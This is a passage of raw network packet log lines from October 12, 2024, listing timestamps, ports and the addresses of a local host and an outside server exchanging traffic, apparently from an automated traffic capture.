                                                    Oct 12, 2024 20:30:06.254684925 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254715919 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254730940 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.254750013 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254762888 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.254782915 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254818916 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254825115 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.254851103 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254885912 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254916906 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254931927 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.254951000 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.254962921 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.295128107 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295196056 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295212984 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.295233965 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295267105 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295300961 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.295301914 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295337915 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295367002 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.295375109 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295430899 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.295443058 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.336009026 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.339901924 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.339967966 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340003967 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340033054 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.340038061 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340071917 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340106964 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340121031 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.340142012 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340164900 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.340171099 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.340492964 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.342396975 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342451096 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342484951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342516899 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342534065 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.342550993 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342575073 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.342583895 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342618942 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.342628002 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.342647076 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343046904 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343230009 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343281984 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343316078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343328953 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343349934 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343401909 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343405008 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343461990 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343507051 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343513012 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343544960 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343579054 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343591928 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343612909 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343667030 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343698978 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343713045 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343744993 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343750000 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343799114 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343843937 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343864918 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343914986 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343946934 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.343957901 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.343976974 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344012976 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344041109 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344047070 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344088078 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344101906 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344136953 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344185114 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344188929 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344221115 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344252110 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344261885 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344285965 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344317913 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344352007 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344366074 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344384909 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344407082 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344435930 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344485998 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344520092 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344536066 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344549894 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344573975 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344583988 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344618082 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344628096 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344651937 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344691992 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344724894 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344738960 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344762087 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344778061 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344811916 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344846010 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344870090 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344877005 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344911098 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344933033 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.344944954 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344978094 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.344995022 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345010996 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345042944 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345074892 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345088959 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345108032 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345119953 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345140934 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345179081 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345211029 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345226049 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345247030 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345256090 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345276117 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345308065 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345321894 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345344067 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345372915 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345388889 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345406055 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345439911 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345453978 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345473051 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345505953 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345516920 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345541000 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345612049 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345772028 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345870972 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345900059 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.345921993 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.345952034 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346004963 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346033096 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346038103 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346084118 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346090078 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346122026 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346154928 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346168995 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346188068 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346220970 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346234083 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346255064 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346287966 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346321106 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346334934 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346354961 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346363068 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346508980 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346617937 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346618891 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346647024 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346700907 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346745968 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346754074 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346805096 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346838951 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346851110 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346872091 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346880913 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.346904993 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346936941 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346965075 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.346970081 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347008944 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347017050 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347050905 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347084999 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347106934 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347117901 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347148895 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347162008 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347183943 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347215891 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347248077 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347265959 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347279072 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347301960 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347327948 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347361088 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347373962 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.347419024 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347450018 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.347462893 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.387619019 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387665987 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387722969 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387729883 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.387756109 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387763023 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.387790918 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387824059 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387836933 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.387857914 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387890100 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.387902021 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.429778099 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.432594061 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432646990 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432683945 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432717085 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432753086 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432758093 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.432787895 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432796955 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.432826042 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.432848930 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.432856083 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435092926 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.435235023 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435282946 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435338974 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.435339928 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435375929 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435440063 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.435441017 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435481071 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435514927 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.435540915 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.435549974 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436225891 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436295986 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436309099 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436427116 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436479092 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436480999 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436531067 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436570883 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436582088 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436605930 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436639071 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436647892 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436690092 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436723948 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436743975 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436768055 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436774969 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436806917 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436841011 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436851978 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436872959 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436908007 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436942101 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436955929 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.436975002 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.436989069 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437015057 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437048912 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437079906 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437100887 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437115908 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437128067 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437149048 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437181950 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437194109 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437212944 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437247038 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437262058 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437299967 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437335014 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437386036 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437386990 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437419891 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437473059 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437478065 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437525034 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437527895 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437556028 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437587023 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437602043 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437623978 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437659025 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437674999 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437691927 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437726974 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437760115 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437776089 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437793970 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437808990 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437827110 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437859058 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437891960 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437906981 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437922001 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437941074 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.437954903 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.437987089 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438000917 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438021898 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438055038 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438087940 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438110113 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438122034 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438137054 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438154936 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438170910 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438186884 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438203096 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438220024 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438232899 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438249111 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438263893 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438278913 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438313007 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438344955 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438463926 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438463926 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438716888 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438817978 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438852072 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438874006 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438884974 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438918114 CEST112649710146.70.24.213192.168.2.6
                                                    Oct 12, 2024 20:30:06.438940048 CEST497101126192.168.2.6146.70.24.213
                                                    Oct 12, 2024 20:30:06.438950062 CEST112649710146.70.24.213192.168.2.6
